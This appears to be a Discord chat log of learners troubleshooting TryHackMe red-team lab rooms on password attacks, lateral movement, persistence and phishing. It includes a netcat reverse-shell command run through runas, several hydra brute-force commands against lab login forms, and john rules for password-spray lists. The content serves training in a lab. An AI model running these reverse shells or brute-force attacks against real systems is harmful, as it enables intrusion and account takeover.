#red-teaming-path

Working on the Lateral Movement and Pivoting room, Task 3, I'm having an issue with getting the first reverse shell using runas. Anyone able to help me talk myself through it?

$ runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443"                                                          

Enter the password for ZA.TRYHACKME.COM\t1_leonard.summers:                                         

Attempting to start c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443 as user "ZA.TRYHACKME.COM\t1_leonard.summers" ... 

Ah, ok. I also tried this and did not work for me because I added also /login-get as you can see in my screenshot. I fix it now and is working, but with :F is running, but not finding the password

Another thing that I observed is that I need to write index.php:username instead of index.php?username as it was in the original request

yeah that has to do with hydra syntax

Ok, I understand, thanks!

Gave +1 Rep to @royal void

Currently working on Password Attacks: Task 8. I'm trying to brute force the GET form and I'm stuck with no results. I'm worried I'm not generating the correct password list. These are the rules I'm using for john, applying both to clinic.lst and combining them:

Az"[0-9]" ^[!@#$]

[List.Rules:THM-Custom]
Az"[0-9][0-9]" ^[!@]```

Which question?

Sorry, http-get-form logging in with phillips user

You have to use just the simple clinic list for that one 🙂

Ahhh that worked. Wooow that was troubling me for some time, thank you!

Gave +1 Rep to @calm gyro

You are welcome! 😁

no problem and nice that abdy is starting to get it too to be able to help others

Just got a Tshirt, thanks thm

How should i go about completing the tasks in Task 6 of "Intro to C2"?

I've gotten into the computer, but not sure where to go from there

for the hashes in the meterpreter shell type hashdump for the 2 other flags the hints or questions tell you where to look for them... i.e they are on said accounts Desktops

Gah, was hoping i could skip going through that 😄 I'm impatient since the rewards are limited, heh

thanks!

Gave +1 Rep to @royal void

no problem... also +rep @weak ice

Gave +1 Rep to @frosty creek

damn it

oof

thanks!

did not think the bot would do that

and i thought that would work

now shadow has to wait 5 mins to give lassi the thingy

ooh, it has a cooldown

limits you to give 1 rep point per 5 mins yeah

yeah shadow aims to learn as much as possible from the rooms

hence maybe shadow is doing this a lot slower then others

though the already completed rooms shadow had that they could speedrun through for tickets was an option at the start

Oh no, don't misunderstand. I do read the content and all. I was just hoping it would be more intuitive, as i've been able to do most of it just from individual research and previous knowledge. But i haven't gotten to to metasploit room yet of basic pentesting, so i'm lacking there

how tf do i access the machine in red team enumeration

Doing the last question of password attacks task 8 which is burgess login at /login-post. Is the john single-extra rule really supposed to generate a wordlist of 500k from clinic.lst? That's a honker of a list D:

You should indeed have a big list but 500k seems a lot, then again I don't remember exactly because I wrote the output to a file

there are green start machine buttons in 2 of the tasks.... to access them you hit that button and either start the attackbox from the blue start attackbox button to do it from the website... another alternative is having your own kali linux vm and connecting to the tryhackme vpn on it to access the target machines.... the vpn file can be downloaded from https://tryhackme.com/access as shadow said in #general

Pope says good evening to Shadow!

Can someone help me with the last one? 😅

good evening to you to pope

try with the:S=logout.php there too.... did never get it working checking for the failure

I tried this also

hmm weird then

The list of passwords was generated with this command:|| john --wordlist=list.txt --rules=Single-Extra --stdout | tee final2.txt||

Where list.txt is the first clinic.list

should have worked then

just as a sanity check wc -l final2.txt

How long did you let it run, @calm gyro ? I remember having to wait a little bit

3-5 mins I think

thats too long

537026

okay then it probably matches shadows list

So, the same length as shadow?

yuups

you know what wc -l does???

Yes

for those wondering it is wordcount with the lines param

I have the same wordlist it looks and I'm just waiting for hydra to push through 🦥

but why does it take so long?

are you running this in the attackbox or on a Kali machine?

oh jeez it worked! the first run I tried using sort pass.lst | uniq -u which I think is why it didn't work

worked for shadow.... got the answer from abdy:s ip.... just tested to see if it worked for shadow

yes technically shadow should have asked if they were allowed to test it from their machine too

+rep @weak ice

Gave +1 Rep to @weak ice

Yeah it worked for me as well. hydra completed in just under 2 minutes

there :)

oh thanks inferno

almost forgot

np

Got it now🎉 , I think I just didn't wait enough. I tried more commands because I was still finding issues that I missed

YAY

Yep, I was simply just not patient enough as well.

at maximum the attacks of password things against thm machines is supposed to be around 5 mins

according to the former thm staff member robertabt

also for task 9 shadow recommends creating a password list and user list to use with hydra at the same time to speed up the process

was it not mentioned like this in the exercise?

at least I also did it like that

think it only showed you to do it 1 password at a time ¯_(ツ)_/¯

Hey can someone help me with task 4 in the password attacks room? In the last question i entered the exact command they want from me and it even matches the hint yet its still not the right answer. The command I entered: crunch 5 5 -t "THM@!" -o tryhackme.txt

haha

There is a special character for symbols

i was solving this room (https://tryhackme.com/room/phishingyl). but when i start machine from task 5 after the login i cant do anythink (for example i couldnt create new landing page)

can anyone help me

lol another one fails at that one

I was thinking the same Shadow

Oh so im not the only one?

try using the vpn to connect to the ip for better luck

nope it has been asked a couple times already

yeah the correct command is different to what you think the answer is currently

like I said, there is a special character for symbols

i fell for that one too 😅

i am already connected vpn

read through the documentation again

okay did you wait 5 mins after the machine gave you the ip to make sure gophish had time to load

so should i just skip it?

no obviously you should do what pope recommended... read the documentation and try and correct the command

ok thanks

i will, thanks

Gave +1 Rep to @royal void

the command is like almost perfect, it is just a tiny detail 😄

@ - lower case alpha characters

, - upper case alpha characters

% - numeric characters

^ - special characters including space
is the relevant part of the documentation for you @crude burrow

ohhhhh finally got it

the word "containing" gave it away

yes indeed

great job deadlinkj

thanks!

no problem

Anyone know why clicking on the 'new profile' doesn't do anything ?

Tried google chrome and firefox but no response

Try https://machine-ip:443

That worked, Thank you!

Gave +1 Rep to @spiral forge

hi people, getting trouble installing armitage... any help?

and problem msfdb init.... asking for doing a variable PGPORT for postgres...

can you login metasploit? might have to setup the rpc server through metasploit and use the credentials setup on armitage

https://docs.rapid7.com/metasploit/rpc-api/ should help i havent seen that issue mine was getting the rpc connection to work properly it would complain that connection was being refused but then it would work but the nmap_db commands wouldnt work till i setup the rpc myself. You doing a fresh install? without ever launching metasploit ?

I had trouble with it too, just used Metasploit

worked without problem for shadow from the attackbox

ya i definately feel more comfortable with metasploit never could get the shell_to_metasploit module to actually upgrade my shell to a metasploit session on the intro to c2 room (i think that was the one that walked you through armitage)

started use it... thanks..

Gave +1 Rep to @obtuse bone

basicly on the attackbox you skip some of the setup steps and just run artimage that is preinstalled

yeah that would be nice too..

you skip to the starting and connecting to artimage in the setting up artimage section for the attackbox

and then it just works

i am stuck on the question of password attack

task and question???

it says to use hydra but hydra has a problem with http-get

armitage?

task 8 question 3

it is http-get-form

yeah yeah but hydra blocks at 16 tries

it's a bug of that version i searched

screenshot of that please???

and i should update it but kali linux says that the latest version is 8.x when it is 9.2

yeah

https://security.stackexchange.com/questions/249168/hydra-hangs-after-tasks-number-of-tries

so does it just stop scrolling after the saturday thingy and never moves further down??

yes

because tasks are actually threads

explain please

eugh

probably better for you just download the newest kali iso and install that in a new vm and try from there

as then you probably will get a newer hydra version

ok but i don't have internet connection on my kali vm

or wait i could try

https://tryhackme.com/room/windowslocalpersistence Task 2, last question RID Hijacking, I can't login with the user and password provided. thmuser1 and thmuser2 went fine. Changed the RID to Administrator, was careful to replace the hex number and not to add it (happened to me before). Anyone managed to log in? I was trying with rdp, evil-winrm. All i did was change the RID like described in the description. Did I miss something ?

well 8.x is very old as even ubuntu 20.04 has the hydra 9.0 in their repos as the default

so yeah probably need an update

i used the attackbox

i guess someone should resolve this problem

i use a personal kali vm and use openvpn myself

you could try sudo apt update && sudo apt upgrade on the attackbox maybe? I'm not sure, I've only used the attackbox a few times

already tried

also even weirder that you are getting that error on a thingy that only affects 9.1 according to the bug report you linked too

replace F=Login failed with s=logout.php

tried, same error

or do not use both the failure and success param at the same time

or as shadow stated get the 2022.1 kali build

so i should use personal vm right?

if you not wanna use the attackbox

the attackbox is made to work with basicly all tryhackme rooms so you are fine with it

if you feel like it is not laggy or to slow

wait I think I see your problem

"/login-get get/index.php" should be "/login-get/index.php"

good spotting right there +rep

Gave +1 Rep to @frank scarab

good catch the having the sucess and failure pattern probably wont help either

still if you are running hydra versions as far as 1 major version behind maybe it is still time to update

I have "/login-get/index.php?:[the rest of the command]" in my notes, maybe the ? is necessary too?

nope it is not

ok good to know

hydra -l phillips -P clinic.lst 10.10.48.200 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

how long has that been running? the attackbox might be slow, could take a minute to run through each of the attempts

and there are 2 s=logout.php. Also you can use -f in case it find's the password before the 16 tries, if that's a problem

yeah thats exacty what I have in my notes from when I ran through it

well a different ip of course, but otherwise the same

new IP ?

oh my machine terminated

sorry

terget IP

this is why you not copy commands

as you used shadows dead ip

same, cannot connect

resolved!

thanks

nice! what fixed it?

this

i was missing somehting i guess

awesome

+rep

Gave +1 Rep to @royal void

ah yeah for the rep points you need to reply or ping the user you giving rep to

glad that fixed it for you then

thank you a lot

also

!docs verify

@frank scarab ⬆️

this way you will have a level role and can post screenshots too

oh I was just about to ask you about that, thanks! +rep

also only 1 rep point giveaway per user per 5 mins

It looks like it gave you rep the first time I replied so maybe I can't do it twice so quickly but thank you regardless

yuup exactly

I feel so official now haha, thanks!

well now you can enjoy the fun too

whoa I just won the tryhackme hat! nice!

thank you phishing room lol

im one ticket away from hat 1 month voucher and a pineapple and shirt myself

the pineapples are gone unfortunately, I'm one away from that too. I'm one away from the usb rubber ducky but I haven't checked to see if those are gone yet

awwww 😦 didnt really check if they had a status page on what was in stock lol

yeah it's on the page that announced the red team path and the giveaways, the one that has all the ways to get tickets

I think there were two pineapples and they went pretty quick, must be some fast people out there lol

or lucky

or both'

https://tryhackme.com/resources/blog/red-team-month should have seen that coming though as it would have gotten pretty pricey if there was alot up for grabs hehe

Now I know to be ready ahead of time for advent of cyber this year!

found the page you were talking about

Oh duh I should've just linked it, here it is in case anyone else is looking for it as well https://tryhackme.com/room/tickets3

Still one more OSEP voucher and 5 rubber duckies left!

This really annoyed me. It wanted a 5 character answer, but had to use 6 chars! What?

you mean 7??? just because of those double quotes

It didn't require the double quotes to log as a correct answer, just an extra exclamation point

oh then you got the right answer through answer tolerances

try and reload the page and check the answer again to see the correct one

I see it now, thanks

Gave +1 Rep to @royal void

pretty sure you don't need the ! though, I got it with|| THM^^||

oh nvm, didn't see your response that you already saw that

can somebody tell me the password of password attacks task 9? i've tried all combinations of season year and special character but it still doesn't work

i'm running also one with upppercase first letter now

the user must be guess bc it's the last one it remains

are your special characters at the end or beginning of the word?

end

as it says

or am i wrong?

hmmyeah I had it at the end too

one sec let me check my notes

what command are you using?

to create your list

the rules are

Az"19[0-9][0-9]"

oh thats why

you're only getting years in the 1900s

and Az"20[0-9][0-9]"

nope

also 20

ahh sorry

but what about the special characters?

oh yes sorry it's also Az"19[0-9][0-9][!@#$]"

and Az"20[0-9][0-9][!@#$]"

the words are

Summer Winter Autumn Spring

and

summer winter autumn spring

should i try other special characters?

I don't remember the password but I would add "Fall" to that seasons list, and I had my rules set up slightly different

||Az"[2][0][0-9][0-9]" $[!@#$]||

autumn fall?

or others?

My seasons list has Summer Winter Fall Spring

ok i'll try fall

I don't think that was in the password, but I only wrote down the flag in my notes not the password so I don't remember for sure lol

but the expression you're using for the rules might not be parsing correctly, I think you need brackets to show how many characters there are

so you might only be generating 3 digit years if I'm reading it right

I could be wrong, regex isn't my strong suit and I'm not sure how johntheripper reads it exactly

this is some output

oh okay perfect

that's not getting it though?

right

let me check my bash history, i should have it in there

I just did that room this morning

Oh I see it, yeah add Fall to your list lol

I MEAN

||[List.Rules:THM-Spray]
Az"202[1-2]" $[!@#$%^&*()]||

I used this rule against a list of:

winter
summer
fall
spring
Winter
Summer
Fall
Spring

FOR A NON ENGLISH SPEAKER

I didn't even know fall existes as a word

i'm crying i wasted onee hour

oh no 🤣

wow that must have taken a lot

Yeah I can see how that would send you down a rabbit hole for sure! I'm surprised they didn't use any of the other seasons that are better known haha

I didn't even think about Autumn until you mentioned it, so if it was that I would've been in the same position as you wondering what I was doing wrong for hours

(although they do mention fall in the examples now that I'm looking it over again)

anyone able to help with windows local persistence, flag 13? it involves adding UserInitMprLogonScript to HKCU\Environment with your revshell as the data. I don't see any evidence that UserInitMprLogonScript is being executed at all after logging out and back in, even with simple test scripts.

I found the answer in the #999008613102260275 room

@frank scarab neither fall functioned

and it’s for sure using 2020/2021 in there too?

no it functioned but it continued going and the limit of scrolling was 516

i did it again and it wored

THANK YOU BRO

Awesome I’m glad you got it !!

I also had issues with getting this to work. After trying unsuccessfully multiple times, I reset the box and used RDP to get it eventually

I didn't need to reset the box for this but what worked for me was adding the value in Computer\HKEY_USERS\[Administrator SID]\Environment instead of Computer\HKCU\Environment

Nice, thanks for sharing, that sounds familiar. I did that lab a few days ago so it’s not fresh 😅

Gave +1 Rep to @patent pawn

guys anyone had issues loading gophish site ?

I had to switch browser, Chromium worked, Firefox didn’t. I was using my own Kali VM

ok let me try that

I'm using Kali VM too

Go to https://[MACHINE-IP]:443/ instead of the link provided, accept the certificate, and then it should load. I also had this problem.

this worked , Thank you

Gave +1 Rep to @patent pawn

Well... should've done a better search before posting but for those who might encounter this issue I just followed @patent pawn recommendation and it worked like a charm... thanks @patent pawn!

Gave +1 Rep to @patent pawn

Hey all, when getting 3 streak freeze tickets, do I have to redeem them straight away? Do they disappear after the 21st of September and how to the streak freezes work? Do they only apply for the next 7 days or does it last forever and stops my streak from restarting on any random 7 days?

What am I doing wrong here?

thanks man

Gave +1 Rep to @patent pawn

THM should be "hard coded:

it said containing THM@! so at least THM should be in there

that is what I was doing initially but but couldnt figure out the two remaining characters, then i though it wanted the command for a list that would happen to have THM@! in it idk

Remove the -o and have the output prints to the console see how it looks like

it will help you out

@zealous wind this is the hint btw

yes, the "options" should contains the phrase to generate the right output

how about u put "THM" and don't make the 2 special characters too specific

mayb with ||^^|| insead

@zealous wind I have generated a wordlist with the required text tho? confused af

yea but it's not the intended answer

look at this

the hint says 5 5, is that meant to be exact or like an example

@late marsh the answer should also be quoted otherwise you have spaces and thats not what you want

5 5 means that 5 min and 5 max length

@main oyster I know that, was wondering if the 'hint' showed the exact or an example

exact

right

the wording is tripping me out

only the options that u have to figure out

so it doesnt want a list that happens to contain THM@!

.

damn it lmao

this also stated that ^^ is for symbols

the answer format '*" literally had two extra Asterix's

which is just rude

i did ,,,^^ which is just a loooooooong version of THM^^

thanks lmao

Alright I'm in the room active directory basics,
Where I'm supposed to reset Sophie's password, and set it for her to change her password on log on,
So Now I logged in as sophie and trying to set the new password but it's keeps saying password doesn't match , I'm 100% sure my passwords match

how can i take or put aallll --stdout from hydra list rules and put it in a file?

Output redirect doesn't work? --stdout > file.txt

nope.. ive tried already

oh... i tried without stdout and work

try with just the redirect > and not the flag?

that way the ool output will just be written to the file

you can do some clever stuff like > file.txt & tail -f file.txt if you want to monitor its progress & read it as it happens

the output worked... but whatam i doing wrong in this syntax? causa the pass doesnt work...

already tried http-post-form and didnt work either...

looks okay

c is Caps

@zealous wind you had this same issue right ?

c?

yeah maybe typo in the pass? best way to check is copy & paste rather than typing - though you might have already done this

nope... caps are not the problem

your syntax is wrong

check the condition

and change the the HTTP method (if you are at the step of the challenge)

and make sure you are using the right list with the right rule 😉

already change it to post

lookin on the condition

oh yeah the list is ok

maybe is the condition

can someone tell me what i'm doing wrong

and the first one?

what first one

this condition would be the right?

you show only the second pass..

no

try going for positive and not negative

i showed the two

check the beginning

right sorry

gave me a pass but doesnt work

your syntax is wrong

condition is right, but look again

you are missing something

sh****t

missing? there is more syntax?

no, its just wrong

still trying...😭

look at how the success condition should look like

thats my problem, if isnt like the previous task, i dont know how it should like...

the previous was logout.php, but it was like this on thm...

the success condition dose not change between tasks

oooh got it!!!!

finally!!!

Sweet!

Basic maths i was dumb 😂

hey...

room thelayoftheland task 9 dns question...

I am trying to perform AXFR query but I get Query refused because of security settings..

what am I doing wrong?

souldnt be that the pass?

no

should i create a list with season+year+special char?

not big list

What's the full command you are using ?

just 2020 and 2021

where u get that pass?

and if u are dealing with symbols use ' ' around the pass

I tried inside nslookup
ls -d thmredteam.com
also inside nslookup
set type=AXFR
thmredteam.com

well.. i thought may be the same on the task

And you are running that on the attached target machine, not on your own ?

yes

I can't send pics but yes I am in the windows machine

Have you also provided the IP of the dns server with server machine_IP ?

oh forgot to sorry

1m

You have to verify first in order to be able to send screenshots in here

!docs verify

thanks it worked.. I forgot to specify server...

Gave +1 Rep to @native berry

thanks I will...

what is wrong here?

what room?

password spray last task

Hm you only have passwords with ! As symbol?

I don't recall the symbol by heart but I think you can try others

got it with /@

And still no succes?

I think he meant "got it" as in succeeded

Aah ok

man is this hanging for anyone else?

just used || snmpwalk -v2c -c public <Machine ip>|| and it worked

why you only used ! the room didn't specify this character

it's 1 char but it's not supposed to be !

yay... already made it with @

ok

doing pishing now

Hi there, I'm stuck at SandBox Evasion Challange. I can either pass the sleep check or memory,network and geofilter checks but not both. Do you have any idea where might be the problem?

anyone has any idea why i cant post pictures in the channel?

when i drag and drop an image in other channels it works but here nothing happens

weird

You have to verify first

!docs verify

thx

Gave +1 Rep to @native berry

Windows Local Persistence - Task 2: can anyone point out what I'm missing here? I'm opening a text file but get no shell, the script works though. tried with quates and without

in the phising room, does the gophish page work for you? it refused to load for me

Windows Local Persistence (https://tryhackme.com/room/windowslocalpersistence) Task 2, flag 3, RID Hijacking. I can't login with thmuser3 and evil-winrm (or rdp). users 1 and 2 went fine. Changed the hex value to 500. Did I miss something ?

That's the attempt to login and the error message I get. After changing the RID with regedit. I've tried some techniques from the other users too, like assigning it to groups or privileges for Backup Operators. Changed the password for thmuser3 too. No login

Ok, it worked now. I was using remmina and I've edited an existing connection I had. After I've added a new connection and didn't use an existing but edited connection, it worked. I'll have to redo the whole room to see if that really was why it didn't work

You sure that's task 2. Since I was doing Task 2 now and I don't remember that.

No problems withj the phising room on my side. Try to restart the machine

This worked for me. No quotes, Does the backdoor script work ? When you execute it on the command line ?

And check with dir if the backdoor script has the right extension. ps1 not ps1.txt like windows likes to add an extension by itself

Why doesnt the ssh has the user token? do I always need to use runas? I mean I already entered the credentials in the SSH login, and whoami shows the exact same user, im a bit confused here

nevermind they wanted me to use a different user's credentials

Although im getting an access denied error:

How I created the shell:

task 3 my bad

yes, the script works

strange, this one worked for me without problems, maybe a machine restart will resolve it

yeah, trying

if it's only about the flag and if it works on the command line, you can get the flag and revisit the task later

when i run the script manually and get a shell i get an error when executing flag6.exe

Sorry! You are still missing something. No flag for you yet. (6)

and i cant get the damn thing to run via registry

It definitely works. Double check the backdoor PS1 file, the extension , the registry entry. I didn't do anything different than how it's described on the page

Script

extension

registry entry

what am i missing? looks legit to me

seems legit to me too

Hey @zealous wind

Are you sure about the registry path

You are probably editing the textfile not txtfile

Can you verify the registry path real quick

Geez!!!! you are right!

Yeah you know how i know that 🫢😂

Got stuck on the same place for a while

Thought so.....

Keep it up 👏🏻

happened to me more then i can count 😄

thanks for pointing it out!

📝👏🏻

hahaha sometimes the fatigue kicks in after a working day, I was trying to find why it was not working, in the end I forgot to start the VPN 😅

hm is it because all prizes are claimed it is so calm here? 😄

I too man, did you answered already ?

neither the binary leaked or the flag ?

from evasion logging room

ok fine i found it lol

What did you do to finally get it to work? I feel like I am following the instructions but no luck.

Yeah was digging around but wasn't sure if there might actually be something wrong or if it was juat people blaming the task.

Anyone have issues on Password Attacks toon, task 8, last question? Got everyone one else of them done but can’t seem to make headway in it

picture

20 times doing this... the machine never do the task
go to sleep.... let me know if anybody has the same problem or in this room the machin isnt workin well...

Gm fam

is there an issue on windows privesc under red team path? can't connect to the machine via rdp

Im using my kali to connect, then xfreerdp

hello mate, here's the screenshot

can't paste the image here...

I was able to access it now using attackedbox

Thanks mate

hii can anyone help me

rooo name red team

Evading Logging and Monitoring

task 10

Enter the flag obtained from the desktop after executing the binary.

i tried many times to solve this problem

please anyone help me

Hello, any solution for the gophish website? Is loading and I can not access the features

For me was working just via the Attack Machine from the site

How did you access the gophish website?

the public one seems to be having issues from time to time

I tried from my Kali machine on Firefox and Chronium and didn't work. From the Kali Attack Machine on THM was working fine

but what IP address did you use to access the goPhish site

because I also used a Kali machine and it worked just fine by accessing it via the localhost

This one: https://MACHINE_IP.p.thmlabs.com:8443

Did you uh, start the machine?

Yes, yes😂 I just mask the ip of the machine before sending here

Why?

hmm

I know there is no risk, but I do it out of habit😅

I can share with you if you want to test it

btw

I believe if you are connected over vpn you can remove the thmlabs.com in the link

only machine_ip:8443

Nope, is not working for me

So the website is reachable, but is not loading. Like this:

:/

But is ok, I already wrote here that I was able to made the tasks using the Attack Machine from the website 😄

I still would like to understand why it is not working

because it worked fine for me 😄

err xD

Why is the file missing?

In Task 4 of Network Security Solutions it asks how you would go about setting up a ncat session to listen on the Telnet port... not sure what I'm missing on my answer. How did you think through that question?

We don't see your answer, so that's difficult to help

nvm... I got it... I kept using the UDP option for no good reason

Can you try searching for a .exe ?

Hi guys!! I'm doing the "passwordattacks" room and I'm having problemas with the question "Perform a brute-forcing attack against the phillips account for the login page at http://10.10.188.218/login-get using hydra? What is the flag?"

I'm trying to brute force the user with the custom wordlist made with words of https://clinic.thmredteam.com/ in raw and It doesn't work. I need to use a rule-based attack?

can you show us the command you are using?

Of course!

hydra -l phillips -P clinic.lst 10.10.188.218 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed!" -f

did you check the contents of the clinic.lst?

is everything populated?

105```

./cewl.rb -m 8 -w clinic.lst https://clinic.thmredteam.com/

The rule-based attack in the SMTP question with the same wordlist worked

hmm

I also don't immediately see the problem

I'm going to try to restart the VM...

If not, I cant try from the attackbox, I had some problems these days from my laptop for some reason

the only thing is, I have just used cewl rather than cewl.rb

Thanks

Gave +1 Rep to @celest vessel

I could check what my clinic.lst contains

protected
Research
Oxytocin
Paracetamol
Cortisol
appointment
Cardiology
February
providing
treatment
commonly
hospital
Template
tooplate
Pregnancy
Saturday
Copyright
Laboratory
Departments
Insurance
healthier
Exercise
customised
Lifestyle
Balanced
nutrition
Benefits
clinical
innovative
technology
experience
multidisciplinary
surgeons
researchers
specialists
together
medicine
pressing
findings
medicines
treatments
President
Weronika
Phillips
released
reaction
connections
stressful
situations
reliever
alleviate
referred
response
APPOINTMENT
Department
Additional
location
affiliated
professionals
establishing
maintaining
qualified
physicians
committed
tailored
specific
requirements
official
Medicalmedical
porttitor
imperdiet
vestibulum
molestie
Phasellus
vulputate
Vestibulum
vehicula
placerat
venenatis
eleifend
Technology
Consultant
thmredteam
Professional
interdum
condimentum
pellentesque
fringilla
volutpat
tincidunt
Maecenas
lobortis
facilisis
pulvinar
dignissim
Suspendisse
Facebook
maecenas
voluptate
Introducing
Categories
pharetra
Curabitur
consequat
ultricies

Could be a case-sensitive problem?

wait

I do see a typo

You use F=Login-failed

what if you try S=Login-failed ?

@marsh birch ?

That means it will stop when the text is founded, isn't it?

it means it should show you the valid credentials in case of success

It doesn't work. It stops at the beginning of the wordlist and the password isn't correct

Because found the text "Login Failed"

hydra -l phillips -P clinic.lst 10.10.173.10 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=Login failed!" -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-14 15:58:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:1/p:105), ~7 tries per task
[DATA] attacking http-get-form://10.10.173.10:80/login-get/index.php:username=^USER^&password=^PASS^:S=Login failed!
[80][http-get-form] host: 10.10.173.10   login: phillips   password: protected

"protected" is the first entry of the wordlist

And isn't the password for phillips

try S=Logout.php

and not login failed

Let's try

It works!

yesh!

But how could I know this is going to be the redirected page if I don't have valid credentials to test it?

I mean, I don't have the information of how is the webpage when a user is logged, so how could I solve this question without this information?

well this is a practice environment

in reality you would have to enumerate such information

Ok thanks!!

no problem

Sorry for asking again, I'm having problems doing this room. How can I guess the password in the "Password spray attack" part?

I tried with the one in the example but it doesn't work, and the hint is too much to guess. I need to create a wordlist with this wildcard?

yes

you need to a username list

and a password list

using hydra

and there is a hint with what the password could be

so the exercise is challenging you to reuse the tools you have learned

Ok, I didn't know I need to creat a password list too. Thanks!

My wordlist has near 8000 entries and I used years from 2010 and this special characters: !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ The task is taking too much time, any suggestion?

Are you on THMIIS? Maybe you are trying to get the flag from THMJMP2?

@celest vessel

I've reduced the special characters to !@

But it doesn't find the password

What is the first access type mentioned in the document?
Any ideas?

Without providing what room and what task you are talking about it's hard to help

Then you have an issue 😄

Never mind I download not the right file lol

Rules of engagement

Red team engagement

Aaah wait

Did you use capital letters? 😉

Nop................

Hehehe

OMG jajajaj I'm gonna try it

It took my quite a while to find out

It's true that in the examples they start in caps

It should take less than a minute to hit the answer

Yeah it works 😁

🤟

Haha good for you 😁

All prizes redeemed already, much faster then 21st 😄 super cool, still the path is awesome even though that tickets are out of the game 😄

same problem here but i is there a john the ripper rule to like add all of this to years?

oh for the password spraying online attack??? in the password attacks room???

task 9

password attacks

yuup that is the one

you can use hydra to use 2 lists.... if you want shadows password list for said task here you go:

ty

and how did u generate it?

manually.....

Yeah, with a python script in my side

i was trying so hard to avoid it

Bad luck

eh it was quick to do with copy and pasting and sublime text regex stuffs and replace

Sublime hacks jajaaj

sublimetext>>> mousepad

got a pass

ty

+rep @royal void

Gave +1 Rep to @royal void

no problem

reedemed the red teamer prize

ty

You need to verify 😄

Wait, are not prizes anymore?😱

I really think that this task is not as it should be. Because the idea of spraying attack is not to focus on a list of passwords and to focus on one common password. Even if the hint is season + year + symbol, the password should be simple, but instead of that I remember I was trying a lot finding the right password and I was put in the situation to make again a rule list of a lot of passwords. In this case the practical part is not focus on spraying attack anymore...

I don't really follow you, I do see this task as a password spray. You are spraying "a password" to all the users. Since the password is not the right one you go onto the next password spray and so on until you get at hint. I believe sometimes the explanation at the exercises is not always as it should be. This last task was a combination of multiple aspect, I found it very interesting, except for the part when I realized there are also capital letters 😅🙈

The problem is when you try to use this method with changing the password until you reach 20 attempts 😢 I don't believe that the task was not good, but just not good for the specific example. Idk is just my opinion

Maybe not but if it would work with a given password the task would maybe have been a bit light

I don't know, like I said, sometimes the questions are a bit weird

why does it keep hanging here

i was having issues with armitage which is why im using meterpreter

armitage said this initally

and then armitage never worked

i mean i can launch it

How long is it hanging there? Or how long are you waiting?

ive left it like this for 10 minutes

my issue with the teamserver is this and when i try doing it again it just says "its currently running, try to kill"

Might be some connection issue.
If you check ip a s do you only see tun0 or any extra like tun1, tun2 etc.?

just tun0

lo eth0 and tun0

If your attacking machine is a VM, do you have any personal VPN running on the machine that is hosting your kali ?

Ah that reminds me

ur right i forgot i had a vpn running on my personal machine

i had it on for 2 seconds and forgot abt it

k

should i restart my vpn script?

after turning off host vpn

Not sure if necessary, but why not

so i accidentally closed the tab and run the script again

so now i have two tun

with both the same vpn ip

how do i get rid of one

sudo killall openvpn

ah

And connect again after that

hm still seems to hang

Give it a 2 - 3 mins

okay

If nothing changes, you could also try sudo ip link set dev tun0 mtu 1200

It worked

thanks for the help

Hey friends how y’all doing I need help with windows persistence task 4 abusing services after trying to create a service and while trying to execute I get this error = the service didn’t response to the start or control request in a timely fashion what I’m I doing wrong and do you all have to start the room all over again just cause you are not able to finish it and you won’t be able to retrieve the next flag cause you didn’t retrieve the last one just asking cause I had to start this over and over again cause I can’t finish it all at once

I'm kind of confused about Task 6 of the Password Attacks room... anyone else on the same boat? The question asks for "S[Word]NN where S is special symbol (!@) and N is a number [0-9]... what is that rogue " at the beginning?

apparently a typo

Again how are you guys able to get the payload on the windows after generating using msfvenom wget won’t work for me nor invoke-web request

Got it. Thanks @royal void ... that was kind of dumb

Gave +1 Rep to @royal void

I'm having some issues with cewl and the Nokogirl package when trying to generate the list. Has anyone found this problem and a solution to it?

Nokogirl package ? What would you need that for in the password attacks room ?

cewl is complaining about an uninitialized constant on my end for the Nokogiri:classresolver... I guess an update of that package on my end is not working well or something. I might look into removing it if that is all that can be done.

nokogiri

Oh, that's part of cewl ?
Ye, don't even know about that, thought you installed something extra beside cewl 😄

well, I removed it and it removed cewl with it but upon execution it requested to install cewl again and that resolved the problem

yes, it seems it is part of the internals of cewl

I did a: sudo apt-get remove ruby-nokogiri and then got 'cewl' command not found after that, but it prompted me to install the application again... so we are all good here

wget should work. If it doesn't, you can always use impacket's smbserver.py script to make a share on your linux box that can be accessed from the Windows host. You can also just use RDP to connect to the machine and drag and drop it 🙂

roughly speaking... how long did the http-post-form and the password spray attacks take for you? I was running the first and sort of gave up because it was taking forever... and the ssh attack is also taking a good while

k... got SSH

https://tryhackme.com/room/dataxexfilt# currently trying to get an http tunnel setup for task 6 but dispite doing what the instructions say all i get is "Empty reply from server" this is both using kali through vm and attackbox

someone having problems with this.. task 2 Win Local persistance...

never make system.bak

i had issues with that i waited an hour and nothing but cancled and reissued the command and it worked for me

the problem is system.bak, sam.bak do it instantly

i already cnacel and try 20 times

ya not sure what was going on had to reissue the command to get it to work it hanged the first time

cant pass this task cause of it

since yesterday

system.bak is a lot larger hence it takes more time

wait more than 1 hour???

obviously not that long'

ya dont know what was happening for me but it was much quicker when i cancled and reissued the command

ive already canceled it many times

and resolved my issue on the other room the page gives you the wrong ip

so frustrating cant go on cause of it

well we could cheat a bit if you are okay with that

shadow has the hashes stored so that you could use that to jump to the log in with evil-winrm and the hash

well... in this instance im ok with cheat

so it okay if shadow dm:s the hashes then???

yeah

and sent

and a quick note for a future room your likely to encounter on the http tunnel bit on the data exfiltration room the room says to set the tunnel to http://172.20.0.121:80 when its actually http://172.20.0.120:80

shadow had another problem after making said files as they did not want to download to shadows machine so shadow had to download them to the attackbox

did you report that in #room-bugs so they could fix the typo???

thank you for informing i neglected that

thanks both, will take notes of that

and sent a message too the channel

